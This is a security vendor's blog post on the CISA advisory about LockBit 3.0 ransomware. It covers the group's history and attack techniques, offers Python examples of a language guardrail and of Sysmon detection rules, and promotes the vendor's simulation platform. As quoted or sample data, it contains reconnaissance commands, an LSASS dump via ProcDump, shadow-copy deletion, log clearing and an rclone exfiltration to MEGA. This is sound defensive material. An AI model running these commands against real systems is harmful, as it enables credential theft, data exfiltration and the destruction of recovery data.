CISA Alert AA23-075A: The Latest LockBit Ransomware Variant - LockBit 3.0
This blog was updated on June 15th, 2023 after the release of CISA Alert AA23-165A.
On March 16th, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released joint advisory AA23-075A on LockBit 3.0 ransomware from the notorious Ransomware-as-a-Service (RaaS) gang LockBit [1]. Because LockBit operates as RaaS, its affiliates target organizations across a wide range of industries and countries.
Picus Threat Library already had attack simulations for LockBit 3.0 ransomware. In this blog, we explain tactics, techniques, and procedures used by the LockBit ransomware group and how you can assess your security posture against LockBit ransomware attacks.
LockBit Ransomware Group
The LockBit ransomware group is one of the most prolific threat groups in the ransomware scene. It was first observed in September 2019 and has released multiple ransomware variants since then.
LockBit is a financially motivated group that uses the business models now common in the ransomware economy: Ransomware-as-a-Service (RaaS), double extortion, and buying access from Initial Access Brokers (IABs). The affiliate model greatly increases the number of threat actors operating the tooling, and because the attacks are opportunistic, targets span nearly all industries and countries rather than following a pattern. By some estimates, LockBit has accounted for nearly 40% of ransomware incidents worldwide.
What Is LockBit 3.0 Ransomware?
LockBit ransomware developers first released their original ransomware sample in September 2019. Back then, it was named ABCD ransomware. In 2020, they launched their RaaS affiliate program and leak site with the adoption of RaaS and double extortion models. Since then, the ransomware gang has developed several ransomware variants and expanded their operations. Due to a large number of affiliated threat actors, LockBit tools and infrastructure were observed in major ransomware attacks against large organizations such as Accenture, Continental, Foxconn, and many others.
Date | Event
September 2019 | Release of ABCD ransomware, the first variant developed by LockBit
January 2020 | Start of the LockBit RaaS affiliate program
September 2020 | Creation of the LockBit leak site
June 2021 | Release of LockBit 2.0 (LockBit Red) and of the StealBit data exfiltration tool
October 2021 | Release of LockBit Linux-ESXi Locker v1.0
March 2022 | Release of LockBit 3.0 (LockBit Black)
September 2022 | LockBit 3.0 builder leaked; several non-affiliated LockBit variants emerge
January 2023 | Release of LockBit Green
Table 1: Timeline of LockBit operations
LockBit 3.0, also known as LockBit Black, was first observed in early 2022 and formally launched by the group in June 2022. It is more modular and evasive than its predecessors: the operator configures the payload's behaviour both when it is built and through command-line options at execution, and the payload itself stays encrypted until it is run with the correct password, which makes analysis and detection considerably harder.
Example 1: LockBit Black Ransomware Attacks by Countries [2]
Emergence of LockBit Green
After the release of LockBit Black, the LockBit group announced a bug bounty program for vulnerabilities in its ransomware and infrastructure, a first in the RaaS scene. The program did not prevent internal strife: in September 2022 a developer leaked the LockBit 3.0 builder, and several groups have since used it to produce their own LockBit-based variants.
In January 2023, LockBit released its latest ransomware variant named LockBit Green. This new variant incorporates source code from the infamous Conti ransomware and shares significant similarities with Conti v3.
TTPs Used by LockBit 3.0
Tactic: Initial Access
T1078 Valid Accounts
LockBit ransomware threat actors utilize valid accounts to gain initial access to their targets' environment. These valid accounts are sometimes acquired from Initial Access Brokers (IABs). Valid accounts are also used for establishing persistence in the victims' networks.
T1133 External Remote Services
LockBit affiliates gain access through exposed remote services, most often RDP and VPN gateways, in some cases by brute-forcing the credentials.
T1189 Drive-by Compromise & T1566 Phishing
LockBit threat actors trick their victims into downloading and executing a malicious zip file that contains SocGholish malware. The malware then deploys a Cobalt Strike beacon for persistent access for attackers. SocGholish malware is also used for system and domain information discovery.
powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; net group 'Domain Admins' /domain ; net group 'Enterprise Admins' /domain ; net localgroup Administrators /domain ; net localgroup Administrators ;
Example 2: Commands executed by SocGholish malware [3]
T1190 Exploit Public Facing Applications
LockBit-affiliated threat actors exploit vulnerabilities in public-facing applications such as Microsoft Exchange servers, FortiGate SSL VPNs, F5 BIG-IP, ESXi servers, and Microsoft IIS servers. Most of the exploited vulnerabilities are known and have patches available; organizations should patch exposed services or apply the vendor workarounds as soon as possible.
Tactic: Execution
T1072 Software Deployment Tools
The LockBit group has used Chocolatey, an open-source Windows package manager, to install and run its tooling, since a package-manager workflow blends in with legitimate software deployment and draws less scrutiny than dropping binaries by hand.
Tactic: Persistence & Privilege Escalation
T1547 Boot or Logon Autostart Execution
Adversaries set the Winlogon automatic logon values below (under HKLM) so that the chosen account signs in automatically at boot, which gives them persistence and, when the account is privileged, elevated access without re-authenticating.
Registry Key | Value | Data
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | AutoAdminLogon | 1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | DefaultUserName | <username>
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | DefaultDomainName | <domain_name>
Autologon also needs the account password, which Windows reads from a DefaultPassword value in the same key (stored in cleartext) unless it has been moved into an LSA secret. A host with AutoAdminLogon set to 1 should therefore be checked both for the persistence and for the exposed credential.
Tactic: Defense Evasion
T1027 Obfuscated Files or Information
To avoid detection, LockBit encrypts host and bot information before sending it to its command and control servers.
T1070.004 Indicator Removal: File Deletion
After successfully completing the attack, LockBit 3.0 ransomware deletes itself from the infected host to hinder malware analysis.
T1480.001 Execution Guardrails: Environmental Keying
In some cases, the LockBit group distributes the ransomware payload to affiliates in a password-protected, encrypted form: the affiliate must supply the correct password on the command line at execution, and without it the binary can neither run nor be analyzed. This keeps the decrypted code out of reach of sandboxes and signature-based scanners until run time.
Tactic: Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
LockBit threat actors use ProcDump, a Microsoft Sysinternals tool, to dump the memory of the LSASS process. The dump is then parsed offline to recover credentials.
Tactic: Discovery
T1046 Network Service Discovery & T1082 System Information Discovery
LockBit ransomware threat actors use a publicly available network scanner named SoftPerfect Network Scanner. This tool collects information about hostnames, network services, and remote access protocols in their victims' networks.
T1614.001 System Location Discovery: System Language Discovery
LockBit ransomware checks the language settings of the infected host and exits without encrypting anything if the language is on its exclusion list. For example, LockBit 3.0 does not encrypt files when the language setting is Arabic (Syria), Romanian (Moldova), or Tatar (Russia).
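The guardrail above, written out as an added example (this is not LockBit's code, nor from the advisory). It shows how a Windows LANGID is laid out, which is what an analyst sees when the check is read from a disassembly: the low 10 bits are the primary language, the high 6 bits the sublanguage, and an LCID carries the LANGID in its low 16 bits. Only the three locales named on this page are listed, and the assumption that both the system and the user UI language are consulted is ours.

```python
"""Language-based execution guardrail as described above. Added example, not
LockBit's own code. LANGID layout per Microsoft: low 10 bits = primary
language, high 6 bits = sublanguage; an LCID carries the LANGID in its low 16
bits. Only the three locales named on the page are listed here (the real
exclusion list is longer). Assumption: both system and user UI language are
checked."""

from typing import Tuple

# Microsoft-assigned LANGID constants for the locales named on the page.
LANGID_ARABIC_SYRIA = 0x2801      # ar-SY: primary 0x01 (Arabic),   sub 0x0A
LANGID_ROMANIAN_MOLDOVA = 0x0818  # ro-MD: primary 0x18 (Romanian), sub 0x02
LANGID_TATAR_RUSSIA = 0x0444      # tt-RU: primary 0x44 (Tatar),    sub 0x01
LANGID_ENGLISH_US = 0x0409        # en-US, used as the non-excluded control

EXCLUDED_LANGIDS = frozenset({
    LANGID_ARABIC_SYRIA, LANGID_ROMANIAN_MOLDOVA, LANGID_TATAR_RUSSIA,
})


def langid_from_lcid(lcid: int) -> int:
    """Drop the sort ID (bits 16-19) and reserved bits; keep the 16-bit LANGID."""
    return lcid & 0xFFFF


def split_langid(langid: int) -> Tuple[int, int]:
    """Return (primary language, sublanguage) from a 16-bit LANGID."""
    return langid & 0x3FF, (langid >> 10) & 0x3F


def is_excluded(langid: int) -> bool:
    """Exact-match check of a LANGID or LCID against the exclusion list."""
    return langid_from_lcid(langid) in EXCLUDED_LANGIDS


def should_skip_host(system_ui_langid: int, user_ui_langid: int) -> bool:
    """Abort before any encryption if either UI language is on the list."""
    return is_excluded(system_ui_langid) or is_excluded(user_ui_langid)


if __name__ == "__main__":
    for lid in (LANGID_ARABIC_SYRIA, LANGID_ROMANIAN_MOLDOVA, LANGID_TATAR_RUSSIA):
        primary, sub = split_langid(lid)
        print(f"0x{lid:04X}: primary=0x{primary:02X} sub=0x{sub:02X}")
    print("skip en-US host with ar-SY user UI:", should_skip_host(LANGID_ENGLISH_US, LANGID_ARABIC_SYRIA))
```

Because the match is on the whole LANGID, a host whose UI language is Arabic but with a different sublanguage than Syria would not be excluded by this three-entry list; the real list is longer, and any defensive reliance on it is an unsupported trick, not a control.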
Tactic: Lateral Movement
T1021.001 Remote Services: Remote Desktop Protocol
Adversaries use Splashtop, a commercial remote desktop product, to move between hosts in the victims' network with interactive sessions that look like ordinary remote administration.
Tactic: Command and Control
T1071.002 Application Layer Protocol: File Transfer Protocols
LockBit threat actors use a popular file transfer tool called FileZilla to transfer files between compromised hosts and attackers' C2 servers.
T1572 Protocol Tunneling
Adversaries use PuTTY Link (Plink) to script SSH connections from the victims' hosts. Wrapping command-and-control traffic in an SSH tunnel blends it into ordinary encrypted traffic and hides its contents from network inspection.
Tactic: Exfiltration
T1567 Exfiltration Over Web Service
LockBit threat actors use popular file-sharing services such as MEGA to exfiltrate their victims' sensitive data using rclone, an open-source cloud storage manager.
Tactic: Impact
T1485 Data Destruction & T1490 Inhibit System Recovery
LockBit deletes log files, files in the recycle bin folder, and volume shadow copies after encrypting the victims' files. These actions significantly hinder the forensic and recovery efforts of security teams.
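The behaviours described in this section and in the earlier ones on SocGholish discovery commands (Example 2), the Winlogon autologon registry values, ProcDump against LSASS, and rclone exfiltration all leave traces in process-creation and registry telemetry. The following added example (not code from Picus or the CISA advisory) runs simple detection rules over constructed Sysmon-style events. The event layout is assumed (EventID 1 with CommandLine, EventID 13 with TargetObject), the sample events are made up, and the specific command forms for shadow copy deletion (vssadmin, wmic) and log clearing (wevtutil) are common ones we assume, since the page names the behaviour rather than the command.

```python
"""Detection logic for several LockBit 3.0 behaviours described on this page,
run over constructed Sysmon-style events. Added example, not code from Picus
or the CISA advisory. Assumed event layout: EventID 1 (process creation)
carries CommandLine; EventID 13 (registry value set) carries TargetObject and
Details. Command forms for shadow copy deletion and log clearing are assumed."""

import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    event_id: int        # Sysmon event type the rule applies to
    pattern: re.Pattern  # matched against CommandLine (EID 1) or TargetObject (EID 13)


RULES: List[Rule] = [
    Rule("Domain recon chain (nltest / net group)", "T1482/T1069.002", 1,
         re.compile(r"nltest\s+/(dclist|domain_trusts)"
                    r"|net\s+group\s+[\"']?(domain|enterprise) admins", re.I)),
    Rule("LSASS dump via ProcDump", "T1003.001", 1,
         re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\s.*lsass", re.I)),
    Rule("Shadow copy deletion", "T1490", 1,
         re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows"
                    r"|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    Rule("Event log clearing", "T1070.001", 1,
         re.compile(r"wevtutil(\.exe)?\s+cl\s", re.I)),
    Rule("rclone to cloud storage", "T1567", 1,
         re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    Rule("Winlogon autologon configured", "T1547", 13,
         re.compile(r"\\Winlogon\\(AutoAdminLogon|DefaultPassword)$", re.I)),
]


def evaluate(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Return (event index, rule name, technique) for every rule an event trips."""
    hits = []
    for idx, ev in enumerate(events):
        subject = ev.get("CommandLine", "") if ev["EventID"] == 1 else ev.get("TargetObject", "")
        for rule in RULES:
            if rule.event_id == ev["EventID"] and rule.pattern.search(subject):
                hits.append((idx, rule.name, rule.technique))
    return hits


# Constructed sample events (not real telemetry); paths and names are made up.
WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; "
                    "net group 'Domain Admins' /domain ; net localgroup Administrators"},
    {"EventID": 1, "Image": r"C:\Users\Public\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\ls.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": "wevtutil cl Security"},
    {"EventID": 1, "Image": r"C:\Users\Public\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Finance mega:exfil --transfers 8"},
    {"EventID": 13, "TargetObject": WINLOGON + r"\AutoAdminLogon", "Details": "1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},                                    # benign
    {"EventID": 13, "TargetObject": WINLOGON + r"\Shell", "Details": "explorer.exe"},  # benign
]


if __name__ == "__main__":
    for idx, name, tech in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {tech:<16} {name}")
```

Two caveats a detection engineer would add before shipping rules like these: command-line regexes miss renamed binaries (match on OriginalFileName or file hash as well as the image name), and ProcDump invoked with the LSASS process ID instead of the name (`-ma 624`) only becomes visible once the PID is correlated with a process-creation event for lsass.exe.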
T1486 Data Encrypted for Impact
LockBit ransomware uses a hybrid encryption approach with AES and RSA encryption algorithms.
How Does Picus Help Simulate LockBit Ransomware Attacks?
We strongly suggest simulating LockBit ransomware attacks to test the effectiveness of your security controls using Picus The Complete Security Validation Platform. You can also test your defenses against hundreds of other ransomware families, such as Zeppelin, Royal, and Maui, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for LockBit ransomware:
Threat ID | Threat Name | Attack Module
74169 | LockBit Green Ransomware Download Threat | Network Infiltration
43227 | LockBit Green Ransomware Email Threat | Email Infiltration (Phishing)
76668 | LockBit 3.0 Malware Downloader Download Threat | Network Infiltration
30789 | LockBit 3.0 Malware Downloader Email Threat | Email Infiltration (Phishing)
24168 | LockBit 3.0 Ransomware Download Threat | Network Infiltration
71275 | LockBit 3.0 Ransomware Email Threat | Email Infiltration (Phishing)
42142 | LockBit 2.0 Ransomware Email Threat | Email Infiltration (Phishing)
56526 | LockBit 2.0 Ransomware Download Threat | Network Infiltration
59891 | LockBit Ransomware Email Threat | Email Infiltration (Phishing)
55537 | LockBit Ransomware Download Threat | Network Infiltration
Moreover, Picus Threat Library contains 300+ threats containing 3000+ web application and vulnerability exploitation attacks in addition to 1500+ endpoint, 8000+ malware, email and data exfiltration threats as of today.
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address LockBit ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for LockBit ransomware:
Security Control | Signature ID | Signature Name
Check Point NGFW | 85259031 | Malicious Binary.TC.a9a1gtaF
Check Point NGFW | 0DF8EAD47 | Ransomware.Win32.LockBit.TC.4595IgpB
Check Point NGFW | 0B9B5200F | Ransomware.Win32.LockBit.TC.ad
Check Point NGFW | 0A9203C66 | Trojan-Ransom.Win32.Encoder.ndg.TC.468eHzih
Check Point NGFW | 0E8314685 | Trojan.Win32.Generic.Win32.Generic.TC.fac8lKAS
Check Point NGFW | 0974D1461 | Ransomware.Win32.LockBit.TC.ac72xYUR
Check Point NGFW | 08A63F7F6 | UDS:Trojan-Ransom.Win32.Generic.TC.ddcbnxCE
Check Point NGFW | 0F78C125A | Trojan.Win32.Generic.Win32.Generic.TC.53caLqjh
Check Point NGFW | 0D3183045 | Trojan-Ransom.Win32.Encoder.ndj.TC.9769PdQO
Check Point NGFW | 0A62659F4 | Trojan-Ransom.Win32.Encoder.ney.TC.2f27eHNJ
Check Point NGFW | 088F2DF9C | Trojan-Ransom.Win32.Encoder.nfh.TC.0f7dmjJv
Check Point NGFW | 0E3B25556 | Trojan.Win32.Ransomware.Win32.LockBit.TC.2e8dsGuZ
Check Point NGFW | 0D83B7962 | Trojan.Win32.Ransomware.Win32.LockBit.TC.fbefAOYh
Check Point NGFW | 0B44AC79B | Trojan.Win32.Ransomware.Win32.LockBit.TC.d0f1pgCM
Check Point NGFW | 0B2A953A5 | Trojan.Win32.Ransomware.Win32.LockBit.TC.23a4LuVq
Check Point NGFW | 0B4088178 | Trojan.Win32.Ransomware.Win32.LockBit.TC.1619pCUl
Check Point NGFW | 0EE101D4F | Ransomware.Win32.LockBit Green.TC.55ddsbul
Check Point NGFW | 0E9ACE64D | Ransomware.Win32.LockBit Green.TC.3813mKCF
Cisco FirePower | | W32.Auto:baafd4.in03.Talos
Cisco FirePower | | W32.80E8DEFA53-95.SBX.TG
Cisco FirePower | 1.58024.1 | MALWARE-OTHER Win.Ransomware.Lockbit download attempt
Cisco FirePower | 1.54910.1 | MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt
Cisco FirePower | 1.54911.1 | MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt
Cisco FirePower | | Win.Ransomware.Lockbit::in03.talos
Cisco FirePower | | Auto.FB49B9.261467.in02
Forcepoint NGFW | | File_Malware-Blocked
Fortigate AV | 10113116 | VBA/Agent.F230!tr
Fortigate AV | 10079067 | NSIS/Injector.AOW!tr
Fortigate AV | 10123717 | W32/Lockbit.K!tr.ransom
Fortigate AV | 10042007 | W32/Lockbit.C2F8!tr.ransom
Fortigate AV | 10093469 | W32/LockBit.2513!tr.ransom
Fortigate AV | 8138651 | W32/Filecoder.NXQ!tr.ransom
Fortigate AV | 10089996 | MSIL/GenKryptik.EBMY!tr.ransom
Fortigate AV | 8183406 | W32/LockBit.29EA!tr.ransom
Fortigate AV | 10085361 | W64/GenKryptik.FSFZ!tr.ransom
Fortigate AV | 8273597 | W32/Conti.F!tr.ransom
Fortigate AV | 62183 | PossibleThreat
McAfee | 0x40232600 | HTTP: Microsoft Word DOCX Macro Vulnerability
McAfee | 0x4840c900 | MALWARE: Malicious File Detected by GTI
Palo Alto NGFW | 543891824 | trojan/Win32.nemesis.hz
Palo Alto NGFW | 514958735 | Trojan-Ransom/Win32.encoder.xj
Palo Alto NGFW | 419491650 | trojan/Win32 EXE.encoder.ua
Palo Alto NGFW | 527143790 | trojan/Win32 EXE.malware.bdkw
Palo Alto NGFW | 344149788 | trojan/Win32 EXE.filecoder.adu
Palo Alto NGFW | 334282092 | Malware/Win32.msilinj.dsw
Palo Alto NGFW | 333569703 | Malware/Win32.msilinj.dsj
Palo Alto NGFW | 343726995 | Trojan-Ransom/Win32.wanna.xn
Palo Alto NGFW | 332681025 | ransomware/Win32 EXE.wanna.xj
Palo Alto NGFW | 573007961 | TrojanDownloader/Win64.bazaarloader.b
Palo Alto NGFW | 571147349 | Ransom/Win32.conti.cb
Snort | 1.2019835.2 | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project
Snort | 1.58024.1 | MALWARE-OTHER Win.Ransomware.Lockbit download attempt
Snort | 1.54910.1 | MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt
Snort | 1.54911.1 | MALWARE-OTHER Win.Ransomware.LockBit ransomware download attempt
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus The Complete Security Validation Platform.
References
[1] "#StopRansomware: LockBit 3.0," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a. [Accessed: Mar. 17, 2023]
[2] "LockBit ransomware - what you need to know." [Online]. Available: https://www.tripwire.com/state-of-security/lockbit-ransomware-what-you-need-know. [Accessed: Mar. 17, 2023]
[3] "Back in Black: Unlocking a LockBit 3.0 Ransomware Attack," NCC Group Research, Aug. 19, 2022. [Online]. Available: https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/. [Accessed: Mar. 17, 2023]